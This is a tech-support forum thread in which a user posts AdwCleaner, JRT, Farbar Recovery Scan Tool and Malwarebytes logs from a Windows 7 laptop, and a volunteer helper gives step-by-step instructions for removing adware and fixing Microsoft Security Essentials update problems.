# AdwCleaner v5.201 - Logfile created 04/07/2016 at 12:17:24
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-04.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (X64)
# Username : User1 - DAUNTLESS
# Running from : C:\Users\User1\Desktop\adwcleaner_5.201.exe
# Option : Clean
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\ProgramData\AVG Secure Search
[-] Folder Deleted : C:\ProgramData\AVG Security Toolbar
[-] Folder Deleted : C:\ProgramData\avg web tuneup
[#] Folder Deleted : C:\ProgramData\Application Data\AVG Secure Search
[#] Folder Deleted : C:\ProgramData\Application Data\AVG Security Toolbar
[#] Folder Deleted : C:\ProgramData\Application Data\avg web tuneup
[-] Folder Deleted : C:\Program Files (x86)\avg web tuneup
[-] Folder Deleted : C:\Program Files (x86)\Common Files\AVG Secure Search
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\avg web tuneup
[-] Folder Deleted : C:\Users\User1\AppData\Local\avg web tuneup
[-] Folder Deleted : C:\Users\User1\AppData\LocalLow\avg web tuneup
[-] Folder Deleted : C:\Users\User1\AppData\Roaming\download Manager
[-] Folder Deleted : C:\Users\User1\Documents\Coupons

***** [ Files ] *****

[-] File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\wtu-secure-search.xml

***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\s
[-] Key Deleted : HKCU\Software\tinydm.com
[-] Key Deleted : HKLM\SOFTWARE\Conduit
[-] Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Tiny download manager]
[#] Value Deleted : HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Software\Microsoft\Windows\CurrentVersion\Run [Tiny download manager]

***** [ Web browsers ] *****

[-] [C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : aol.com
[-] [C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : ask.com
[-] [C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web Data] [Search Provider] Deleted : winx-dvd-ripper.en.softonic.com

*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner Logfile.txt - [2452 bytes] - [04/07/2016 12:17:07]
C:\AdwCleaner\AdwCleaner[C1].txt - [2516 bytes] - [04/07/2016 12:17:24]
C:\AdwCleaner\AdwCleaner[S1].txt - [2452 bytes] - [04/07/2016 12:08:19]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [2662 bytes] ##########
 

# AdwCleaner v5.201 - Logfile created 04/07/2016 at 12:08:19
# Updated 30/06/2016 by ToolsLib
# Database : 2016-07-04.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (X64)
# Username : User1 - DAUNTLESS
# Running from : C:\Users\User1\Desktop\adwcleaner_5.201.exe
# Option : Scan
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

Folder Found : C:\ProgramData\AVG Secure Search
Folder Found : C:\ProgramData\AVG Security Toolbar
Folder Found : C:\ProgramData\avg web tuneup
Folder Found : C:\ProgramData\Application Data\AVG Secure Search
Folder Found : C:\ProgramData\Application Data\AVG Security Toolbar
Folder Found : C:\ProgramData\Application Data\avg web tuneup
Folder Found : C:\Program Files (x86)\avg web tuneup
Folder Found : C:\Program Files (x86)\Common Files\AVG Secure Search
Folder Found : C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\avg web tuneup
Folder Found : C:\Users\User1\AppData\Local\avg web tuneup
Folder Found : C:\Users\User1\AppData\LocalLow\avg web tuneup
Folder Found : C:\Users\User1\AppData\Roaming\download Manager
Folder Found : C:\Users\User1\Documents\Coupons

***** [ Files ] *****

File Found : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\wtu-secure-search.xml

***** [ DLL ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

Key Found : HKLM\SOFTWARE\Classes\s
Key Found : HKCU\Software\tinydm.com
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Software\tinydm.com
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Tiny download manager]
Value Found : HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Software\Microsoft\Windows\CurrentVersion\Run [Tiny download manager]

***** [ Web browsers ] *****

[C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : aol.com
[C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : ask.com
[C:\Users\User1\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : winx-dvd-ripper.en.softonic.com

*************************

C:\AdwCleaner\AdwCleaner[S1].txt - [2300 bytes] - [04/07/2016 12:08:19]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2373 bytes] ##########
 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.6 (04.25.2016)
Operating System: Windows 7 Professional x64
Ran by User1 (Administrator) on Mon 07/04/2016 at 12:38:56.86
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0




Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 07/04/2016 at 12:41:48.10
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 


  • 0

#4
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Hello,

Thanks I'll need to adjust my instructions on the logs for adwcleaner.

Download the enclosed =>Attached File  fixlist.txt   4.7KB   78 downloads Save it in the location FRST64 is. Run FRST and click on the Fix button. Wait until finished.

The tool will make a log in the location FRST is, (Fixlog.txt). Please post it to your reply.
  • 0

#5
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

Thanks again! Here's the log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by User1 (2016-07-04 15:26:32) Run:1
Running from C:\Users\User1\Desktop\FRST64
Loaded Profiles: User1 (Available Profiles: User1 & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
C:\Users\User1\AppData\Local\DM\TinyDM.exe
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\Run: [Tiny download manager] => C:\Users\User1\AppData\Local\DM\TinyDM.exe [1007384 2015-12-17] (hxxp://www.tinydm.com/)
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: G - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {3c8896c8-dd30-11e3-88f5-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a980d-6b8a-11e5-a9ee-f4b7e2e86230} - E:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a9827-6b8a-11e5-a9ee-f4b7e2e86230} - E:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {495a9998-6b8a-11e5-a9ee-f4b7e2e86230} - G:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {5adc93e3-8f9d-11e4-bd55-f4b7e2e86230} - D:\KODAK_Camera_Setup_App.exe
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {a5031a2d-947b-11e5-9d8a-f4b7e2e86230} - D:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {cbbb3579-933d-11e5-a15a-6c881415336c} - F:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {d85adddf-4d94-11e5-946b-f4b7e2e86230} - "D:\WD SmartWare.exe" autoplay=true
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {ebaca168-8207-11e5-bc08-3c970e8c25d9} - D:\setup_vmb_lite.exe /checkApplicationPresence
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\MountPoints2: {fcdaaf94-6d83-11e5-811c-3c970e8c25d9} - F:\setup_vmb_lite.exe /checkApplicationPresence
SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation)
SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation)
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User1\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll No File
C:\Users\User1\AppData\Local\Temp\jre-8u60-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\User1\AppData\Local\Temp\jre-8u91-windows-au.exe
C:\Users\User1\AppData\Local\Temp\MSIZAP.EXE
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Constant Guard Protection Suite.lnk -> hxxp://security.comcast.net/?cid=xfactiv_security (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Live PC Help.lnk -> hxxp://www.thephonesupport.com/?src=dtop (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY Connect.lnk -> hxxp://www.comcast.net/qry/goto?app=mail&cid=xfactiv_email (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY TV.lnk -> hxxp://xfinitytv.comcast.net/?cid=xfactiv_tv (No File)
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"C:\Users\User1\AppData\Local\DM\TinyDM.exe" => not found.
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Tiny download manager => value not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\G" => key removed successfully
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3c8896c8-dd30-11e3-88f5-806e6f6e6963}" => key removed successfully
HKCR\CLSID\{3c8896c8-dd30-11e3-88f5-806e6f6e6963} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{495a980d-6b8a-11e5-a9ee-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{495a980d-6b8a-11e5-a9ee-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{495a9827-6b8a-11e5-a9ee-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{495a9827-6b8a-11e5-a9ee-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{495a9998-6b8a-11e5-a9ee-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{495a9998-6b8a-11e5-a9ee-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5adc93e3-8f9d-11e4-bd55-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{5adc93e3-8f9d-11e4-bd55-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a5031a2d-947b-11e5-9d8a-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{a5031a2d-947b-11e5-9d8a-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{cbbb3579-933d-11e5-a15a-6c881415336c}" => key removed successfully
HKCR\CLSID\{cbbb3579-933d-11e5-a15a-6c881415336c} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d85adddf-4d94-11e5-946b-f4b7e2e86230}" => key removed successfully
HKCR\CLSID\{d85adddf-4d94-11e5-946b-f4b7e2e86230} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebaca168-8207-11e5-bc08-3c970e8c25d9}" => key removed successfully
HKCR\CLSID\{ebaca168-8207-11e5-bc08-3c970e8c25d9} => key not found.
"HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fcdaaf94-6d83-11e5-811c-3c970e8c25d9}" => key removed successfully
HKCR\CLSID\{fcdaaf94-6d83-11e5-811c-3c970e8c25d9} => key not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\EldosMountNotificator => value removed successfully
"HKLM\Software\Classes\CLSID\{5FF49FE8-B332-4CB9-B102-FB6951629E55}" => key removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\\EldosMountNotificator => value removed successfully
"HKLM\Software\Wow6432Node\Classes\CLSID\{5FF49FE8-B332-4CB9-B102-FB6951629E55}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt1"" => key removed successfully
"HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt2"" => key removed successfully
"HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt3"" => key removed successfully
"HKCR\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt4"" => key removed successfully
"HKCR\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt5"" => key removed successfully
"HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt6"" => key removed successfully
"HKCR\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt7"" => key removed successfully
"HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\"DropboxExt8"" => key removed successfully
"HKCR\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}" => key removed successfully
C:\Users\User1\AppData\Local\Temp\jre-8u60-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\jre-8u66-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\jre-8u71-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\jre-8u73-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\jre-8u77-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\jre-8u91-windows-au.exe => moved successfully
C:\Users\User1\AppData\Local\Temp\MSIZAP.EXE => moved successfully
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Constant Guard Protection Suite.lnk -> hxxp://security.comcast.net/?cid=xfactiv_security (No File) => Error: No automatic fix found for this entry.
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Live PC Help.lnk -> hxxp://www.thephonesupport.com/?src=dtop (No File) => Error: No automatic fix found for this entry.
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY Connect.lnk -> hxxp://www.comcast.net/qry/goto?app=mail&cid=xfactiv_email (No File) => Error: No automatic fix found for this entry.
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY TV.lnk -> hxxp://xfinitytv.comcast.net/?cid=xfactiv_tv (No File) => Error: No automatic fix found for this entry.

=========  bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {725F97B7-633A-4144-AB59-BCB689DC49B5}.
Unable to cancel {D3017BDD-AF61-488C-8E1B-176A799DE7D5}.
0 out of 2 jobs canceled.

========= End of CMD: =========


=========  netsh winsock reset catalog =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


=========  ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2572138134-34439291-2312372487-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 13341796 B
Java, Flash, Steam htmlcache => 74198303 B
Windows/system/drivers => 422715875 B
Edge => 0 B
Chrome => 241436615 B
Firefox => 412828045 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 110664 B
systemprofile32 => 74669 B
LocalService => 3035170 B
NetworkService => 4011124 B
User1 => 1720403122 B
DefaultAppPool => 66228 B

RecycleBin => 588630 B
EmptyTemp: => 2.7 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 15:28:02 ====


  • 0

#6
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
  • Please download Malwarebytes Anti-Malware to your desktop.
  • Double-click mbam-setup-version.exe and follow the prompts to install the program.
  • Launch Malwarebytes Anti-Malware
  • Then click Finish.
  • If an update is found, you will be prompted to download and install the latest version.
  • Once the program has loaded, select Scan now. Or select the Threat Scan from the Scan menu.
  • When the scan is complete , make sure that that all Threats are selected, and click Remove Selected.
  • Reboot your computer if prompted.


    Posting the Malwarebytes log.

    [list]
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the Scan Log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • post that saved log to your next reply.


  • 0

#7
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

Done. Log is below - thanks again!

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 7/4/2016
Scan Time: 4:31 PM
Logfile: MBAM Scan 1.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.07.04.07
Rootkit Database: v2016.05.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: User1

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 348986
Time Elapsed: 15 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


  • 0

#8
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
How is the computer ?

Also,

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Make sure you checkmark Addition.txt box.
  • Press Scan button.
  • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

  • 0

#9
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

The computer is, unfortunately, still having some issues.

 

1) I can't update virus definitions in MSE. The process starts, but stalls out. If I leave the computer alone for awhile, eventually I get a notification that the process failed.

2) I still get that preliminary scan warning when running a quick scan in MSE. The scan doesn't deliver any final results, however.

 

Logs are posted below. Thanks again, and happy fourth!

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2016
Ran by User1 (administrator) on DAUNTLESS (04-07-2016 23:03:38)
Running from C:\Users\User1\Desktop\FRST64
Loaded Profiles: User1 (Available Profiles: User1 & DefaultAppPool)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Authentec Inc.) C:\Program Files\ThinkVantage Fingerprint Software\upeksvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.30.3\GoogleCrashHandler64.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Vodafone) C:\Program Files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Password Manager\password_manager.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
